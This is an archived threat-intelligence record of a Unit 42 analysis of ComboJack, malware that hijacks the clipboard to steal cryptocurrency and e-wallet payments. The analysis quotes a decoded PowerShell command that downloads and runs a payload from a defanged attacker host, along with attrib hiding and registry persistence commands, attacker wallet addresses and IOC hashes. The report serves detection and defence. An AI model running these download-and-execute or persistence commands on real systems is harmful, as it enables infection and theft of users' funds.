{
	"id": "1e5bddc4-2605-4ff8-9ffd-21548a25a756",
	"created_at": "2026-04-06T00:08:39.284499Z",
	"updated_at": "2026-04-10T03:20:57.724587Z",
	"deleted_at": null,
	"sha1_hash": "48ed7b540eef3b39b1193983ebdcb73ef7f1e0dd",
	"title": "Sure, I’ll take that! New ComboJack Malware Alters Clipboards to Steal Cryptocurrency",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 386181,
	"plain_text": "Sure, I’ll take that! New ComboJack Malware Alters Clipboards to Steal Cryptocurrency\r\nBy Brandon Levene, Josh Grunzweig\r\nPublished: 2018-03-05 · Archived: 2026-04-05 13:32:42 UTC\r\n\r\nSummary\r\nUnit 42 researchers have discovered a new currency stealer which targets cryptocurrencies and online wallets. \"CryptoJack\" functions by replacing clipboard addresses with an attacker-controlled address which sends funds into the attacker's wallet. This technique relies on victims not checking the destination wallet prior to finalizing a transaction. In 2017, CryptoShuffler was the first malware to utilize this tactic. In contrast to that one, which focused on numerous cryptocurrencies, ComboJack targets a range of cryptocurrencies as well as digital currencies such as WebMoney and Yandex Money.\r\n\r\nDetails\r\nEarly on the morning of February 25, 2018, Unit 42 and Proofpoint researchers observed an interesting malspam campaign targeting Japanese and American users. This particular campaign tried to entice users by claiming a passport was lost and that the attached PDF contained a scanned copy of the document.\r\nImage 1. Example malspam received by users.\r\nUsers opening this PDF would find a single line of text which refers to an embedded doc file.\r\nhttps://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/\r\nPage 1 of 7\r\nFigure 1. Prompt displayed to the victim when opening the embedded RTF file\r\nSimilar to techniques utilized by Dridex and Locky in mid-2017, the PDF contained an embedded RTF file which contains an embedded remote object that attacks CVE-2017-8579 as discussed in this FireEye report. This embedded remote object is an HTA file which was located at hXXps://a.doko[.]moe/tnejln and which contains encoded PowerShell commands.\r\nImage 2. Contents of the HTA file retrieved from hXXps://a.doko[.]moe/tnejln\r\nDecoding the contents of the HTA file yields the following PowerShell command which downloads and executes a file:\r\nwscript.shell%systemroot%\\system32\\windowspowershell\\v1.0\\powershell.exe (new-object system.net.webclient).downloadfile(hXXp://masolo[.]win/protect/achi.exe $env:appdata\\bstest.exe) ; start $env:appdata\\bstest.exe\r\nThe full flow of execution may be visualized as follows:\r\nFigure 2. Flow of execution leading to ComboJack being installed on the victim\r\nThat leads us to the payload, which we have dubbed ComboJack because of how it attempts to hijack a combination of digital currencies.\r\n\r\nComboJack\r\nThe following files were used for this analysis, which are explained below.\r\nInitial File SHA256: 9613aefc12880528040812b0ce9d3827d1c25fe66f8598eaef82c169e8ed02da\r\nSecond Stage SHA256: cab010b59cf9d649106477df012ca49f939aa537910b56bfadbe1381b0484d88\r\nFinal Payload SHA256: 05dfde82a9790943df8dfab6b690ec18711ce3558f027dd74504b125d24d6136\r\nThe initially downloaded file is a self-extracting executable (SFX) with embedded commands for extracting the second stage. This second stage is a password protected SFX; however, the password is supplied by the first stage. This allows us to easily recover the contents of the second stage. Helpfully, the “setup.txt” from the first stage contains the following:\r\nImage 3. Contents of setup.txt embedded in the first SFX layer of the payload.\r\nOnce the second stage is extracted and run, we are presented with the final stage of this attack, which we refer to as ComboJack. Once ComboJack is extracted it begins by copying itself to the following location:\r\nC:\\\\ProgramData\\\\NVIDIA\\\\NVDisplay.Container.exe\r\nIt then uses the built-in Windows tool, attrib.exe (used for setting file attributes), to set both the hidden and system attributes on itself. This hides the file from the user and allows it to execute with SYSTEM level privileges.\r\n\"cmd /k attrib +s +h \\\"C:\\\\ProgramData\\\\NVIDIA\\\\NVDisplay.Container.exe\\\"\"\r\nFinally, the payload sets the following registry key to ensure persistence:\r\nHKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\NVIDIA – C:\\ProgramData\\NVIDIA\\NVDisplay.Container.exe\r\nWhen the above steps are completed, ComboJack enters an infinite loop. Every half second it checks the contents of the clipboard. The contents of the clipboard are checked against various criteria to determine whether the victim has copied wallet information for various digital currencies. In the event a wallet of interest is discovered, ComboJack will replace it with a hardcoded wallet that the attacker presumably owns, in an attempt to have the victim accidentally send money to the wrong location. This tactic relies on the fact that wallet addresses are typically long and complex, so most users will opt to copy the exact string in order to prevent potential errors. If any potential currency addresses are found, they are replaced following the criteria in the table below:\r\n\r\nChecks for this criteria | Replaces with | Wallet Type\r\nLength of 42 and starts with a ‘0’ | 0xE44598AB74425450692F7b3a9f898119968da8Ad | Ethereum\r\nLength of 106 and starts with ‘4’ | 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBE | Monero. It's important to note that this replacement string is not long enough, as Monero wallet addresses are either 95 or 106 characters in length. This was likely a mistake made by the author.\r\nLength of 34 and starts with ‘1’ | 1LGskAycxvcgh6iAoigcvbwTtFjSfdod2x | Bitcoin\r\nLength of 34 and starts with ‘L’ | LYB56d6TeMg6VmahcgfTZSALAQRcNRQUV | Litecoin\r\nLength of 11 and starts with ‘8’ | 79965017478 | Qiwi\r\nLength of 13 and starts with ‘R’ | R064565691369 | WebMoney (Rubles)\r\nLength of 13 and starts with ‘Z’ | Z152913748562 | WebMoney (USD)\r\nLength of 13 and starts with ‘E’ | 88888888888888888888888888888888888888888888888888 | Unknown\r\nLength of 15 and starts with ‘4100’ | 410014474125403 | Yandex Money\r\nTable 1. Replacement address lookup table hardcoded into ComboJack.\r\n\r\nComboJack shares some similarities in basic functionality with CryptoShuffler, which is a malware family discovered by Kaspersky in 2017. However, whereas CryptoShuffler focused exclusively on cryptocurrencies, ComboJack also targets popular digital payment systems, such as WebMoney (USD, EUR, and RUB), and Yandex Money.\r\n\r\nConclusion\r\nWith the proliferation of cryptomining malware, it is curious to see some actors take a different route to acquiring web-based currency. CryptoShuffler in 2017 may have been only the beginning of simple, yet effective clipboard stealers like ComboJack. By targeting multiple cryptocurrencies and web based wallets, the author of ComboJack appears to be hedging his or her bets on which currency will boom and which will bust. As the prices of cryptocurrencies continue to rise it is likely we will see more and more malware targeting cryptocurrencies, as it presents the fastest way to the highest profit.\r\nPalo Alto Networks WildFire customers are protected from this threat through the following ways:\r\nComboJack malware is identified as malicious and blocked via the Traps and WildFire products\r\nCustomers may monitor and track ComboJack through the AutoFocus tag\r\n\r\nIOCs\r\nLure PDFs:\r\ndd8ba88df50de86e7bb9b6343313e48e1e3b8d1a84ffca0a06a203a2f027cfdc\r\nd3a5313a0070b8400b0d661f2515a0eb83e4e6110b98e9ffb6618e457bf52714\r\n15e6984beea04bf2f26fbbe1e490c59d1f51ba7ad0dce3ac76cea21579ca694b\r\n325fd50143d6d975d9db18cf9a069c9107c3bfcad5a07653d53c0fc315ee27ab\r\nPayload:\r\nbd1b56b6814aae369b0593dfe71450e1b45cb288f752faa2622d1b189bc6b2d6\r\n228e8b728f7b714934f5ecfa6fd5de256d1d24f634a63f2fc4663c7cfb3b9d65\r\n05dfde82a9790943df8dfab6b690ec18711ce3558f027dd74504b125d24d6136\r\nd92b4c622d3524f6d5ce8fe53d802c6a0c51fd1f56ac2b554daac24d7b4fb8ef\r\n4d96d8cfefd9cc3f86bd3ab7f054f0b0acef726a4c349359bf44d22952b4744d\r\n85c27addbf3a7234ac1e2922002fdef216994708bdda28f2ad6d3a7a1b32934e\r\nea5eb17c32767486c1b3a8ee7a8eacefab125c93414cdea97348c2ee96752f7e\r\na6807cf5ed53b34cc9513defcde56c8a956c3d574ee9f300b3a763a7c8287081\r\n8d8f497313ed797090ef552d44198f8c21f0a6ed261b30902d4d37478cd2efeb\r\n47f14c24212c32e686f0b9162530c4b966c9cff907e1920c096ad81d078f20cd\r\n05cbc6b1e98bc6f8935f95454ba214cccaf3a36c497126512669daba59a407a0\r\n8a6f75a4a58bdafed085fd640681a4c94eee54f1bfb6e5eb6dcf8eb7524d2a2e\r\n2ee9a1c554a774925f83428a0822b901d7b3ed81c247cb0d038ecc188d9f9149\r\nd0f6dcdb4f749490a7ef678e9006474c885fbb3d8e396a5c8f2150441bb34782\r\na10a5666ce31c7a3de760f33d93bd924354e7bac1f07bde9e3ac3da8e250eb6d\r\n98e896586ea71f80a2b0024ec86133bfa5163f01f4faa1b1f380f0a2ea128c2f\r\nf9bff08960484d5c97f075090b9843dc1d54839a4dabc514e8f97f809e1ceaf5\r\nc1cc9448ee5684698f7891911821a9eb86f56be8852adef613b2fab4636e7b36\r\nece82af6fa1e94904d62e86fe86810fe85b058e56a311ca24ac7667409cff8c0\r\nSource: https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/"
	],
	"report_names": [
		"unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency"
	],
	"threat_actors": [],
	"ts_created_at": 1775434119,
	"ts_updated_at": 1775791257,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/48ed7b540eef3b39b1193983ebdcb73ef7f1e0dd.pdf",
		"text": "https://archive.orkl.eu/48ed7b540eef3b39b1193983ebdcb73ef7f1e0dd.txt",
		"img": "https://archive.orkl.eu/48ed7b540eef3b39b1193983ebdcb73ef7f1e0dd.jpg"
	}
}